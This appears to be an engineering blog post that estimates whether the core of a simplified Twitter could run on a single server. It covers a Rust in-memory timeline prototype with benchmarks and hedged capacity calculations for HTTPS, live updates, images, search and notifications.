Storing all the historical tweets takes many terabytes of storage. But probably 99% of tweets viewed are from the last few days. This means we can use a hybrid of RAM+NVMe+HDDs attached to our machine in a tiered cache:

RAM will store our hot set cache and serve almost all requests, so most of our performance will only depend on the RAM cache. It’s common to fit 512GB-1TB of RAM in a modern machine.
Modern NVMe drives can store >8TB and do over 1 million 4KB IO operations per second per drive with latencies near 100us, and you can attach dozens of them to a machine. That’s enough to serve all tweets, but we can lower CPU overhead and add headroom by just using them for long tail tweets and probably the follower graph (since it only needs one IO op per timeline request).
Some extra 20TB HDDs can store the very old very cold tweets that are basically never accessed, especially at the 2x compression I saw with zstd on tweet text from a Kaggle dataset.

However, super high performance tiering RAM+NVMe buffer managers which can access the RAM-cached pages almost as fast as a normal memory access are mostly only detailed and benchmarked in academic papers. I don’t know of any good well-maintained open-source ones, LeanStore is the closest. You don’t just need tiering logic, but also an NVMe write-ahead-log and checkpointing to ensure persistence of all changes like new tweets. This is one of the areas where running Twitter on one machine is more of a theoretical possibility than a pragmatic one.

So I just prototyped a RAM-only implementation, and I’ll handwave away the difficulty of the buffer manager (and things like schema migrations) by saying it isn’t that relevant to whether the performance targets are possible, because most requests just hit RAM. This paper shows that you can implement what is basically mmap with much more efficient page faults for only a 10% latency hit on non-faulting RAM reads, plus some TLB misses from not being able to use hugepages. The real overhead is on the writes and faulting reads, and from the handful of cores taken up for logging writes and managing checkpointing, cache reads and evictions.

My Prototype

I made a prototype (source on Github) in Rust to benchmark the in-memory performance of timeline merging and show that I could get it fast enough to serve the full load. At its core is a minimalist pooling-and-indices style representation of Twitter’s data, optimized to be fairly memory-efficient:

/// Leave room for a full 280 English characters plus slop for accents or emoji.
/// A real implementation would have an escape hatch for longer tweets.
pub const TWEET_BYTES: usize = 286;

// non-zero so options including a timestamp don't take any more space
// u32 since that's 100+ years of second-level precision and it lets us pack atomics
pub type Timestamp = NonZeroU32;
pub type TweetIdx = u32;

pub struct Tweet {
    pub content: [u8; TWEET_BYTES],
    pub ts: Timestamp,
    pub likes: u32, pub quotes: u32, pub retweets: u32,
}

/// linked list of tweets to make appending fast and avoid space overhead
/// a linked list of chunks of tweets would probably be faster because of
/// cache locality of fetches, but I haven't implemented that
pub struct NextLink {
    pub ts: Timestamp, // so we know whether to follow further
    pub tweet_idx: TweetIdx,
}

/// Top level feeds use an atomic link so we can mutate concurrently
/// This effectively works by casting NextLink to a u64
pub struct AtomicChain(AtomicU64);

/// Since this is most of our RAM and cache misses we make sure it's
/// aligned to cache lines for style points
#[repr(align(64))]
pub struct ChainedTweet {
    pub tweet: Tweet,
    pub prev_tweet: Option<NextLink>,
}
assert_eq_size!([u8; 320], ChainedTweet); // 5 cache lines

/// We store the Graph in a format we can mmap from a pre-baked file
/// so that our tests can load a real graph faster
pub struct Graph<'a> {
    pub users: &'a [User],
    pub follows: &'a [UserIdx],
}

pub struct User {
    pub follows_idx: usize, // index into graph follows
    pub num_follows: u32,
    pub num_followers: u32,
}

impl<'a> Graph<'a> {
    // We can use zero-cost abstractions to make our pools more ergonomic
    pub fn user_follows(&'a self, user: &User) -> &'a [UserIdx] {
        &self.follows[user.follows_idx..][..user.num_follows as usize]
    }
}

pub struct Datastore<'a> {
    pub graph: Graph<'a>,
    // This is a tiny custom pool which mmaps a vast amount of un-paged virtual
    // address space. It's like a Vec which never moves and lets you append concurrently
    // with only an immutable reference by using an internal append lock.
    pub tweets: SharedPool<ChainedTweet>,
    pub feeds: Vec<AtomicChain>,
}
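The listing above only says that `AtomicChain` "effectively works by casting NextLink to a u64". As an illustration of one way that could look, here is a self-contained sketch. The bit layout (timestamp in the high 32 bits, index in the low 32 bits), the method names `new`, `store` and `fetch`'s body, and the single-writer assumption are all guesses for the sake of the example, not the prototype's actual code.

```rust
use std::num::NonZeroU32;
use std::sync::atomic::{AtomicU64, Ordering};

#[derive(Clone, Copy, Debug, PartialEq, Eq)]
pub struct NextLink {
    pub ts: NonZeroU32,
    pub tweet_idx: u32,
}

/// Assumed packing: timestamp in the high 32 bits, tweet index in the low 32.
/// Because `ts` is non-zero, the all-zero word can stand for "empty chain".
pub struct AtomicChain(AtomicU64);

impl AtomicChain {
    pub fn new() -> Self {
        AtomicChain(AtomicU64::new(0))
    }

    fn pack(link: NextLink) -> u64 {
        ((link.ts.get() as u64) << 32) | link.tweet_idx as u64
    }

    fn unpack(word: u64) -> Option<NextLink> {
        // A zero timestamp means no link has been stored yet.
        let ts = NonZeroU32::new((word >> 32) as u32)?;
        Some(NextLink { ts, tweet_idx: word as u32 })
    }

    /// Read the newest link in this feed, if any.
    pub fn fetch(&self) -> Option<NextLink> {
        Self::unpack(self.0.load(Ordering::Acquire))
    }

    /// Publish `link` as the new head. Assumes a single writer that has
    /// already written the tweet (with its `prev_tweet`) into the pool.
    pub fn store(&self, link: NextLink) {
        self.0.store(Self::pack(link), Ordering::Release);
    }
}

fn main() {
    let feed = AtomicChain::new();
    println!("empty feed: {:?}", feed.fetch());
    let ts = NonZeroU32::new(1_700_000_000).unwrap();
    feed.store(NextLink { ts, tweet_idx: 42 });
    println!("after one tweet: {:?}", feed.fetch());
}
```

Packing both fields into one word means a reader always sees a consistent timestamp and index pair from a single atomic load, with no lock on the read path.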

Then the code to compose a timeline is a simple usage of Rust’s built-in heap:

/// Re-use these allocations so fetching can be malloc-free
pub struct TimelineFetcher {
    tweets: Vec<Tweet>,
    heap: BinaryHeap<NextLink>,
}

impl TimelineFetcher {
    fn push_after(&mut self, link: Option<NextLink>, after: Timestamp) {
        link.filter(|l| l.ts >= after).map(|l| self.heap.push(l));
    }

    pub fn for_user<'a>(&'a mut self, data: &Datastore,
      user_idx: UserIdx, max_len: usize, after: Timestamp
    ) -> Timeline<'a> {
        self.heap.clear(); self.tweets.clear();
        let user = &data.graph.users[user_idx as usize];
        // seed heap with links for all follows
        for follow in data.graph.user_follows(user) {
            self.push_after(data.feeds[*follow as usize].fetch(), after);
        }
        // compose timeline by popping chronologically next tweet
        while let Some(NextLink { ts: _, tweet_idx }) = self.heap.pop() {
            let chain = &data.tweets[tweet_idx as usize];
            self.tweets.push(chain.tweet.clone());
            if self.tweets.len() >= max_len { break }
            self.push_after(chain.prev_tweet, after);
        }
        Timeline {tweets: &self.tweets[..]}
    }
}
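The fetcher above depends on the rest of the prototype, so here is a stripped-down, standalone sketch of the same heap-merge idea that can be run on its own. The `Link` and `Chained` types and the `merge_timeline` function are simplified stand-ins invented for this example; in particular it assumes heap entries order by timestamp first, which the derived `Ord` gives because `ts` is the first field.

```rust
use std::collections::BinaryHeap;

/// Heap entry ordered by timestamp first, so the max-heap pops the newest tweet.
/// Field order matters for the derived `Ord`.
#[derive(Clone, Copy, Debug, PartialEq, Eq, PartialOrd, Ord)]
struct Link {
    ts: u32,
    tweet_idx: u32,
}

/// One stored tweet, reduced to its link to the author's previous tweet.
struct Chained {
    prev: Option<Link>,
}

/// Merge per-author chains into one newest-first list of tweet indices.
fn merge_timeline(
    tweets: &[Chained],
    heads: &[Option<Link>],
    max_len: usize,
    after: u32,
) -> Vec<u32> {
    let mut heap = BinaryHeap::new();
    let mut out = Vec::new();
    // Seed the heap with the newest tweet of every followed feed.
    for head in heads.iter().flatten() {
        if head.ts >= after {
            heap.push(*head);
        }
    }
    while let Some(link) = heap.pop() {
        out.push(link.tweet_idx);
        if out.len() >= max_len {
            break;
        }
        // Step one tweet back along this author's chain if it is still in range.
        if let Some(prev) = tweets[link.tweet_idx as usize].prev {
            if prev.ts >= after {
                heap.push(prev);
            }
        }
    }
    out
}

fn main() {
    // Author A tweeted at ts 10 (idx 0) and 30 (idx 2); author B at 20 (idx 1) and 40 (idx 3).
    let tweets = [
        Chained { prev: None },
        Chained { prev: None },
        Chained { prev: Some(Link { ts: 10, tweet_idx: 0 }) },
        Chained { prev: Some(Link { ts: 20, tweet_idx: 1 }) },
    ];
    let heads = [Some(Link { ts: 30, tweet_idx: 2 }), Some(Link { ts: 40, tweet_idx: 3 })];
    println!("{:?}", merge_timeline(&tweets, &heads, 10, 0));
}
```

The heap never holds more than one entry per followed feed, so its size is bounded by the follow count rather than by the timeline length.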

I wrote a bunch of support code to load an old Twitter follower graph dump from 2010, which is about 7GB in-memory. I used a dump so that I could capture a realistic distribution shape of follower counts and overlaps, while fitting on my laptop. I then wrote a load-generator which selects every user with more than 20 followers (around 7M) to tweet and every user with more than 20 follows (around 9M) to view. I then generate 30 million fresh tweets and then benchmark how long it takes to compose timelines with them on all 8 cores of my laptop and get the following results:

Initially added 15000000 tweets in 5.46230697s: 2746092.463 tweets/s.
Benchmarked adding 15000000 tweets in 5.456315988s: 2749107.646 tweets/s.
Starting fetches from 8 threads
Done 16714668 in 5.054423792s at 3306938.375 tweets/s. Avg timeline size 167.15 -> expansion 100.63
Done 16723580 in 5.072738523s at 3296755.771 tweets/s. Avg timeline size 167.24 -> expansion 100.69
Done 16724418 in 5.077739414s at 3293673.944 tweets/s. Avg timeline size 167.24 -> expansion 100.69
Done 16752863 in 5.079175123s at 3298343.253 tweets/s. Avg timeline size 167.53 -> expansion 100.86
Done 16715614 in 5.081238053s at 3289673.467 tweets/s. Avg timeline size 167.16 -> expansion 100.64
Done 16741876 in 5.083800824s at 3293180.945 tweets/s. Avg timeline size 167.42 -> expansion 100.80
Done 16729038 in 5.090990804s at 3286008.293 tweets/s. Avg timeline size 167.29 -> expansion 100.72
Done 16748782 in 5.096817055s at 3286125.796 tweets/s. Avg timeline size 167.49 -> expansion 100.84

So about 3.3M tweets distributed per core-second, when retrieved with an average timeline chunk of 167. And because it’s mostly cache misses, per-thread performance only goes down to 2.5M/sec when using all 16 hyperthreads, allowing me to reach 40M tweets fetched per second on my laptop. Now I’m fully aware my benchmark is not the full data size of Twitter nor the most realistic load I could create, but I’m just trying to get an estimate of what the full scale performance would look like and I think this gives a reasonable estimate. My test data is way larger than my laptop cache and fully random so basically every load should be a cache miss, and profiling seems to align with this. So while I think memory access is marginally slower when you have more of it, the throughput should be similar on a server that had enough RAM on one NUMA node to fit the full-sized tweet cache. I believe a more realistic, non-uniform load distribution would just make it more likely that the L3 cache actually made things faster.

It also looks like adding tweets to the data structure shouldn’t be a bottleneck, given it adds tweets at over 1M/core-sec when the highest peak Twitter had was 150k/sec.

Can the prototype meet the real load? Very yes!

My prototype’s performance should mainly scale based on number of tweets retrieved (because of cache misses retrieving them) and the size of retrieved chunks (larger chunks dilute the overhead of setting up the follow chain heap). The fixed overhead also scales with average follow count and variable with log follow count, which has probably grown since 2010 but I unfortunately don’t have numbers on, and most of the time is spent in the variable segment anyhow. So let’s see how those numbers stack up to calculations of real Twitter load!

Elon tweeted 100 billion impressions per day which probably includes a lot of scrolling past algorithmic tweets/likes that aren't part of the basic core version of Twitter, but corresponds to an average timeline delivery rate that's 2-3x the number of tweets on an average day from all the people I follow.

avg timeline rate = 400/day

delivery rate = daily active users * avg timeline rate => 100,000,000,000/day

delivery rate in 1/s => 1,157,407.4074/s

avg expansion = delivery rate / avg tweet rate in 1 => 200

delivery bandwidth = tweet avg size * delivery rate in Gbit/s => 1.6296 Gbit/s

delivery bandwidth in TB/month => 535.689 TB/month

But that's for the average. What if we assume that page refreshing spikes just as much as tweet rate at peak times? I don't think this is true: the tweet peak was set with tweeting synchronized on one TV event and lasted less than 30 seconds, but refreshes will be less synchronized even during busy events like the World Cup. Let's calculate it anyways though!

per core = 2.5e6/(thread*second) * 2 thread => 5,000,000/second

peak delivery rate = max tweet rate * avg expansion => 30,000,000/second

peak cores needed = peak delivery rate / per core => 6

peak bandwidth = tweet avg size * peak delivery rate in Gbit/s => 42.24 Gbit/s

To estimate tweets per request, let's start by considering a Twitter without live timeline updating where a user opens the website or app a few times a day and then scrolls through their new tweets.

avg new connection rate = 3/day * daily active users in 1/s => 8,680.5556/s

tweets per request = delivery rate / avg new connection rate in 1 => 133.3333
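The delivery and peak-load figures above can be re-derived with a short Rust sketch. The function names are hypothetical, and the inputs are the numbers already used in this section (250M daily users, 400 timeline tweets per user-day, 176-byte tweets, 5M fetches per core-second).

```rust
const SECONDS_PER_DAY: f64 = 86_400.0;

/// Timeline tweets delivered per second across all users.
fn delivery_rate(daily_active_users: f64, timeline_tweets_per_day: f64) -> f64 {
    daily_active_users * timeline_tweets_per_day / SECONDS_PER_DAY
}

/// Cores needed to serve `fetches_per_s` at `per_core` fetches per core-second.
fn cores_needed(fetches_per_s: f64, per_core: f64) -> f64 {
    fetches_per_s / per_core
}

/// Bandwidth in Gbit/s for `items_per_s` items of `item_bytes` each.
fn gbit_per_s(items_per_s: f64, item_bytes: f64) -> f64 {
    items_per_s * item_bytes * 8.0 / 1e9
}

fn main() {
    let delivery = delivery_rate(250e6, 400.0);
    // Each tweet is delivered to this many timelines on average.
    let expansion = delivery / (500e6 / SECONDS_PER_DAY);
    let peak = 150_000.0 * expansion;
    println!("avg delivery: {:.0}/s at {:.2} Gbit/s", delivery, gbit_per_s(delivery, 176.0));
    println!("avg expansion: {:.0}", expansion);
    println!(
        "peak: {:.0}/s needs {:.1} cores and {:.2} Gbit/s",
        peak,
        cores_needed(peak, 5e6),
        gbit_per_s(peak, 176.0)
    );
}
```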

Looks like my estimate of the full average tweet delivery rate of Twitter is 35x less than what my 8 core laptop can fetch! I also had chosen the average timeline size in the benchmark based on the estimate of normal timeline request sizes. It also looks like serving all the timeline RPCs is a fairly small amount of bandwidth during average load.

There’s lots of room for this to underestimate load or overestimate performance: Peak loads could burst much higher, I could get average timeline sizes or delivery rates wrong, and a realistic implementation would have more overheads. My estimates could be wrong in lots of ways, but there’s just so much performance margin it should be fine. My implementation even seems to scale linearly with cores, and there’s another 10x left before it would start hitting memory bandwidth limitations. Right now it can only add tweets from one thread, which I only have a 20x performance margin on (but from a known peak load), but with a little bit more effort with atomics that could be multi-core too.

This perhaps 350x safety margin, plus the fact that high-performance batched kernel-bypass RPC systems can achieve overheads low enough to do 10M requests/core-s, means I’m confident an RPC service which acted as the core database of simplified production Twitter could fit on one big machine. This is a very limited sense of running “Twitter” on one machine: you’d still have other stateless machines to act as web servers and API frontends to the high-performance binary RPC protocol, and of course this is only the very most basic features of Twitter.

There’s a bunch of other basic features of Twitter like user timelines, DMs, likes and replies to a tweet, which I’m not investigating because I’m guessing they won’t be the bottlenecks. Replies do add slightly to the load when writing a tweet, because they’d need to be added to a secondary chain or something to make retrieving them fast. Some popular tweets have tons of replies, but users only can see a subset, and the same subset can be cached to serve to every user.

To make my hedged confidence quantitative, I’m 80% sure that if I had a conversation with a (perhaps former) Twitter performance engineer they wouldn’t convince me of any factors I missed about Twitter load (on a much-simplified Twitter) or what machines can do, which would change my estimates enough to convince me a centralized RPC server couldn’t serve all the simplified timelines. I’m only 70% sure for a version that also does DMs, replies and likes, because those might be used way more than I suspect, and might pose challenges I haven’t thought about.

Conclusion-ish: It’s not practical to build this way, but maybe it could be

I don’t actually think people should build web apps this way. Here’s all the things I think would go wrong with trying to implement a Twitter-scale company on one machine, and the alternate universe system that would have to exist to avoid that problem:

Your one machine can die: Systems can have remarkable uptime when there’s just one machine, but that’s still risking permanent data loss and prolonged outages. You’d use a number of machines in different buildings in any real deployment. The framework could handle this semi-transparently with some extra cores and bandwidth per-machine using state machine replication and Paxos/Raft for failover.
RAM structures are easy but disks are tricky: You’d need the kind of NVMe virtual memory buffer manager I’ve mentioned hooked up with a transaction log so you can just write a Rust state machine like you would in RAM.
Bad code can use up all the resources: You’d need a bunch of enforcement infrastructure around this. Your task system would need preemption and subsystem memory/network/cpu budgets. You’d need to capture busy day production traces and replay them in pre-deploy CI.
A bug in one part can bring down everything: Normally network boundaries enforce design around failure handling and gracefully degrading. You’d need tools for in-system circuit breakers and failure handling logic, and static analysis to enforce this at the company level.
Zero-downtime deploys and schema evolution are tricky: You’d need tooling to do something like generate getters that check version tags on your data structures and dispatch. Evolvability often conflicts with structures being fixed-size, which means an extra random read for many operations, or having to do deploys via rewriting the whole database and having another system catch up to the present incrementally before cutting over.
Kernel-bypass binary protocol networking is hard to debug: It would take tons of tooling effort to catch up to the ecosystem of Linux networking and text formats before debugging and observability would be as smooth.
What if you want to do something that doesn’t fit on the machine?: You’d want a system which could scale to multiple machines via some kind of state machine replication, remote paging and RPCs. If you want security boundaries between the machines that adds lots of access control complexity. Databases and multicore CPUs already have this kind of technology, but it’s not available outside them.

It’s possible to build systems this way right now, it just requires really deep knowledge and carefulness, and is setting yourself up for either disaster or tons of infrastructure work as your company scales. There’s a feedback loop where few companies in the web space scale this way, so the available open-source tooling for it is abysmal, which makes it really hard to scale this way. I think of scaling this way because I used to work for a trading company, where scaling systems to handle millions of requests per second per machine with microsecond latency kernel-bypass networking is a common way to do things and there’s lots of infrastructure for it. But they still use lots of machines for most things, and in many ways have a simpler problem (e.g. often no state persists between market days and there’s downtime between).

I do kind of yearn for this alternate-universe open source infrastructure to exist though. More hardware-efficient systems are cheaper, but I think the main benefit is avoiding the classic distributed systems and asynchrony problems every attempt to split things between machines runs into (which I’ve written a pseudo-manifesto on before), which means there’s potential for it to be way simpler too. It would also enable magic powers like time-travel debugging any production request as long as you mark the state for snapshotting. But there’s so much momentum behind the current paradigm, not only in terms of what code exists, but what skills readily hireable people have.

Edit: A friend points out that IBM Z mainframes have a bunch of the resiliency software and hardware infrastructure I mention, like lockstep redundancy between mainframes separated by kilometers. They also scale to massive machines. I don’t know much about them and am definitely interested in reading more, and if it weren’t for the insane cost I wouldn’t be surprised if I actually ended up liking modern mainframes as a platform for writing resilient and scalable software in an easy way.

That’s all I originally planned for this post, to show with reasonable confidence that you could fit the core tweet distribution of simplified Twitter on one machine using a prototype. But then it turned out I had tons of cores and bandwidth left over to tack on other things, so let’s forge ahead and try to estimate which other features might fit using all the extra CPU!

Directly serving web requests

The above simplified Twitter architecture doesn’t serve the whole simplified Twitter from one machine, and relies on stateless frontend machines to serve the consumer API and web pages. Can we also do that on the main machine? Let’s start by imagining we’ll serve up a maybe 64KB static page with a long cache timeout that uses some minimized JS to fetch the binary tweet timeline and turn it into DOM.

A benchmark for fast HTTP servers shows a single machine handling 7M simple requests per second. That’s way above our average-case estimate of 15k/s from above, so there’s comfortable room to handle peaks and estimation error. Browser caches and people leaving tabs open on our static main page will probably also save us bandwidth serving it. However HTTP is practically deprecated for providing no security.

Could we fit the bandwidth for 15k/s on a small NIC even without caching? Yes.

home page rate on a small connection = 10Gbit/s / 64KB in 1/s => 19,073.4863/s

I spent a bunch of time Googling for good benchmarks on HTTPS server performance. Almost everything I found was articles claiming the performance penalty over HTTP is negligible by giving CPU overhead numbers in the realm of 1% which include application CPU. The symmetric encryption for established connections with AES-NI instructions is actually fast at gigabytes per core-s, but it’s the public key crypto to establish sessions that’s worrying. When they do give out raw overhead numbers they say numbers like 3.5ms to do session creation crypto as if it’s tiny, which it is for most people, but we’re not being most people! That’s only 300 sessions/core-s! I can find some HTTPS benchmarks, but they usually simulate a small number of clients so don’t test connection establishment.

What likely saves us is session resumption and tickets, where browsers cache established crypto sessions so they can be resumed in future requests. This means we may only need to handle 1 session negotiation per user-week instead of multiple per day, and thus it’s probably possible for an HTTPS server to hit 100k requests/core-s under realistic loads (before app and bandwidth overhead). So even though I can’t find any actually good high-performance HTTPS server benchmarks, I’m going to say the machine can probably directly serve the web requests too.
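To put rough numbers on why resumption matters, here is a sketch of the handshake CPU budget. It assumes the 3.5ms full-handshake cost quoted above, 250M daily users, and compares 3 full handshakes per user-day against 1 per user-week; the function names are made up, and real handshake costs vary with key type and hardware.

```rust
const SECONDS_PER_DAY: f64 = 86_400.0;

/// Full handshakes one core can do per second, given CPU time per handshake.
fn handshakes_per_core_s(handshake_ms: f64) -> f64 {
    1000.0 / handshake_ms
}

/// Cores spent purely on session-establishment crypto.
fn handshake_cores(handshakes_per_s: f64, handshake_ms: f64) -> f64 {
    handshakes_per_s / handshakes_per_core_s(handshake_ms)
}

fn main() {
    let users = 250e6;
    // Without resumption: a full handshake on each of 3 visits per user-day.
    let every_visit = 3.0 * users / SECONDS_PER_DAY;
    // With resumption: roughly one full handshake per user-week.
    let weekly = users / (7.0 * SECONDS_PER_DAY);
    println!("sessions per core-second: {:.0}", handshakes_per_core_s(3.5));
    println!("cores without resumption: {:.1}", handshake_cores(every_visit, 3.5));
    println!("cores with weekly handshakes: {:.1}", handshake_cores(weekly, 3.5));
}
```

Under these assumptions the average handshake load drops from about 30 cores to under 2, though peaks would still need headroom.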

I think there’s a 75% chance, conditional on an RPC backend fitting, that you could also serve web requests. Especially with a custom HTTP3 stack that used DPDK and very optimized static cached pages for a minimalist Twitter, with most uncertainty being maybe session resumption or caches can’t hit that often.

Post-prediction edit: Someone who worked at Twitter confirmed their actual request rates are lower than a fast HTTPS server could handle, but noted that crawlers mean a portion of the requests need to have the HTML generated server-side. I’m going to say crawlers are a separate feature, which I think might fit with careful page size attention and optimization, but might pose bandwidth and CPU issues.

Live updating and infinite scroll

The above is all assuming that people or a JS script refreshes with the latest tweets whenever a user visits a few times a day. But real Twitter offers live updates and infinite scrolling, can we do that?

In order to extend our estimates to live timelines, we'll assume a model of users connecting and then leaving a session open while they scroll around for a bit.

avg session duration = 20 minutes

live connection count = avg session duration * avg new connection rate in 1 => 10,416,666.6667

poll request rate = 1/minute * live connection count in 1/s => 173,611.1111/s

avg tweets per poll = delivery rate / poll request rate in 1 => 6.6667

frenzy push rate = avg expansion * max tweet rate => 30,000,000/second

To estimate the memory usage to hold all the connections I'll be using numbers from this websocket server.

tls websocket state = 41.7 GB / 4.9e6 in byte => 8,510.2041 byte

live connection count * tls websocket state in GB => 88.648 GB
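The live connection count above is an application of Little's law (concurrent sessions equal arrival rate times average duration). A small sketch with a hypothetical helper name, using the same inputs as the notebook:

```rust
/// Little's law: average concurrent sessions = arrival rate * average duration.
fn live_connections(new_sessions_per_s: f64, session_seconds: f64) -> f64 {
    new_sessions_per_s * session_seconds
}

fn main() {
    let new_per_s = 3.0 * 250e6 / 86_400.0; // 3 visits per user per day
    let live = live_connections(new_per_s, 20.0 * 60.0);
    let tls_state_bytes = 41.7e9 / 4.9e6; // per-connection figure quoted above
    println!("live connections: {:.0}", live);
    println!("polls per second at 1/minute: {:.0}", live / 60.0);
    println!("websocket state: {:.1} GB", live * tls_state_bytes / 1e9);
}
```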

The request rate is totally fine, but the main issue is the size of each poll request has gone down, which raises our fixed overhead. We probably have enough headroom that it’s fine, but we can do better either by caching the heap we use for iterating timelines and updating it with new tweets or directly pushing new tweets to open connections. This would require following the tweet stream and intersecting a B-Tree set structure of live connections with sorted follower lists from new tweets, or maybe checking a bitset for live users. This can be sharded trivially across cores and the average tweet delivery rate is low enough, if peaks are too much we can just slip on live delivery.
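As a sketch of the "checking a bitset for live users" option, the following filters a new tweet's follower list down to the users with an open connection. `LiveSet` and `push_targets` are names invented for this example, and a real version would need per-core sharding and concurrent updates, which are left out here.

```rust
/// One bit per user index, set while that user has a live connection open.
struct LiveSet {
    bits: Vec<u64>,
}

impl LiveSet {
    fn new(num_users: usize) -> Self {
        LiveSet { bits: vec![0; (num_users + 63) / 64] }
    }

    fn set(&mut self, user: u32, live: bool) {
        let word = user as usize / 64;
        let mask = 1u64 << (user % 64);
        if live {
            self.bits[word] |= mask;
        } else {
            self.bits[word] &= !mask;
        }
    }

    fn is_live(&self, user: u32) -> bool {
        (self.bits[user as usize / 64] >> (user % 64)) & 1 == 1
    }
}

/// Followers of a new tweet's author who currently have a connection to push to.
fn push_targets(live: &LiveSet, followers: &[u32]) -> Vec<u32> {
    followers.iter().copied().filter(|&u| live.is_live(u)).collect()
}

fn main() {
    let mut live = LiveSet::new(200);
    for user in [3, 64, 199] {
        live.set(user, true);
    }
    println!("{:?}", push_targets(&live, &[1, 3, 64, 100, 199]));
}
```

At one bit per user, a bitset covering 250M users is only about 31MB, so it would fit comfortably alongside everything else in RAM.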

Infinite scrolling also performs better if we can cache a cursor at the end for each open connection, let’s check how much each cached connection-cursor costs:

cached cursor size = 8 byte * avg following => 3,200 byte

live connection count * cached cursor size in GB => 33.3333 GB

We can easily fit one at the start and one at the end in RAM! Given they can be loaded with one IO op it wouldn’t even really slow things down if they spilled to NVMe.

Images: Kinda!?

Images are something I initially thought definitely wouldn’t fit, but I was on a roll so I checked! Let’s start by looking at whether we can serve the images in people’s timelines.

I can't find any good data on how many images Twitter serves, so I'll be going with wild estimates looking at the fraction and size of images in my own Twitter timeline.

served tweets with images rate = 1/5

avg served image size = 70 KB

image bandwidth = delivery rate * served tweets with images rate * avg served image size in Gbit/s => 132.7407 Gbit/s

total bandwidth = image bandwidth + delivery bandwidth => 134.3704 Gbit/s

total bandwidth * 1 month in TB => 44,169.993 TB
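Here is the image bandwidth estimate as a runnable sketch. The helper name is hypothetical, and it assumes binary kilobytes (1024 bytes) with decimal gigabits, since that combination reproduces the notebook's figures.

```rust
const KB: f64 = 1024.0; // binary kilobytes reproduce the figures above

/// Bandwidth in Gbit/s for serving images attached to a fraction of delivered tweets.
fn image_gbit_per_s(tweets_per_s: f64, image_fraction: f64, image_bytes: f64) -> f64 {
    tweets_per_s * image_fraction * image_bytes * 8.0 / 1e9
}

fn main() {
    let delivery = 250e6 * 400.0 / 86_400.0; // timeline tweets delivered per second
    let images = image_gbit_per_s(delivery, 1.0 / 5.0, 70.0 * KB);
    let text = delivery * 176.0 * 8.0 / 1e9; // 176-byte tweets
    println!("image bandwidth: {:.1} Gbit/s", images);
    println!("total bandwidth: {:.1} Gbit/s", images + text);
}
```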

That seems surprisingly doable! I work with machines with hundreds of gigabits/s of networking every day and Netflix can serve static content at 800Gb/s. This does require aggressive image compression and resizing, which is pretty CPU-intensive, but we can actually get our users to do that! We can have our clients upload both a large and a small version of each photo when they post them and then we won’t touch them except maybe to validate. Then we can discard the small version once the image drops out of the hot set.

However there’s lots that could be wrong about this estimate, and there’s less than 8x overhead from my average case to the most a single machine can serve. So traffic peaks may cause our system to have to throttle serving images. I think there’s maybe a 40% chance I’d say it would fit without dropping images at peaks, upon much deeper investigation with Twitter internal numbers, conditional on the basics fitting.

But what would it take to store all the historical large versions?

Tweets with images are probably more popular, so my timeline probably overestimates the fraction of tweets with images that we need to store. On the other hand this page says 3000/s but that would be fully half of average tweet rate so I kinda suspect that's a peak load number or something. I'm going to guess a lower number, especially cuz lots of tweets are replies and those rarely have images, and when they do they're reaction images that can be deduplicated. On the other hand we need to store images at a larger size in case the user clicks on them to zoom in.

stored image fraction = 1/10

avg stored image size = 150 KB

image rate = avg tweet rate * stored image fraction in 1/s => 578.7037/s

image storage rate = image rate * avg stored image size in GB/day => 7,680 GB/day

total storage rate = tweet storage rate + image storage rate in GB/day => 7,768 GB/day

total storage rate * 1 year in TB => 2,837.2037 TB

That amount of image back-catalog is way too big to store on one machine. Let's fall back to using cold storage for old images using the cheapest cloud storage service I know.

image replication bandwidth = image storage rate * $0.01/GB in $/month => $2,337.552/month

backblaze b2 rate = $0.005 / GB / month

cost per year of images = (image storage rate * 1 year in GB) * backblaze b2 rate in $/month => $14,025.312/month
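The storage cost arithmetic above can be checked the same way. This sketch assumes binary kilobytes, decimal gigabytes, and an average Gregorian year of 365.2425 days, which is the combination that reproduces the notebook's numbers; the function names are illustrative only. Note that the result is a recurring monthly bill for each year's worth of stored images.

```rust
const KB: f64 = 1024.0;
const DAYS_PER_YEAR: f64 = 365.2425; // average Gregorian year, matches the figures above

/// Gigabytes of new images stored per day.
fn stored_gb_per_day(tweets_per_day: f64, image_fraction: f64, image_bytes: f64) -> f64 {
    tweets_per_day * image_fraction * image_bytes / 1e9
}

/// Monthly bill for keeping `stored_gb` in storage priced per GB-month.
fn monthly_storage_cost(stored_gb: f64, dollars_per_gb_month: f64) -> f64 {
    stored_gb * dollars_per_gb_month
}

fn main() {
    let per_day = stored_gb_per_day(500e6, 0.1, 150.0 * KB);
    let per_year = per_day * DAYS_PER_YEAR;
    println!("image storage rate: {:.0} GB/day", per_day);
    println!("one year of images: {:.0} TB", per_year / 1000.0);
    println!(
        "monthly bill per stored year: ${:.2}",
        monthly_storage_cost(per_year, 0.005)
    );
}
```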

Luckily Backblaze B2 also integrates with Cloudflare for free egress.

So if we wanted to stick strictly to one server we’d need to make Twitter like Snapchat where your images disappear after a while, maybe make our cache into a fun mechanic where your tweets keep their images only as long as people keep looking at them!

Features that probably don’t fit and are hard to estimate

Video

Video uses more bandwidth than images, but on the other hand video compression is good and I think people view a lot less video on Twitter than images. I just don’t have that data though, and my estimates would have such wild error bars that I’m not going to try; I’ll just say we probably can’t do video on a single machine.

Search

Search requires two things, a search index stored in fast storage, and the CPU to look over it. Using Twitter’s own posts about posting lists to get some index size estimates:

avg words per tweet = tweet content avg size / 4 (byte/word) => 35 word

posting list size per tweet = 3 (byte/word) * avg words per tweet + 16 byte => 121 byte

index size per year = avg tweet rate * posting list size per tweet * 1 year in TB => 22.0972 TB

It looks like a big NVMe machine could fit a few years of search index, although it would also need to store the raw historical tweets.

However I have no good idea how to estimate how much load Twitter’s search system gets, and it would take more effort than I want to estimate the CPU and IOPS load of doing the searches. It might be possible but search is a pretty intensive task and I’m guessing it probably wouldn’t fit, especially not on the same machine as everything else.

Notifications

The trickiest part of notifications is that computing the historical notifications list on-the-fly might be tricky for big accounts, so it probably needs to be cached per user. This probably would need to go on NVMe or HDD and be updated with a background process following the write stream, which also would send out push notifications, and could fall behind during traffic bursts. This is probably what Twitter does given old notifications load slowly and very old notifications are dropped. Estimating whether this would fit would be tricky, the storage and compute budget is already stretched.

Someone who worked at Twitter noted that push notifications from celebrities and their retweets can synchronize people loading their timelines into huge bursts. Randomly delaying celebrity notifications per user might be a necessary performance feature.

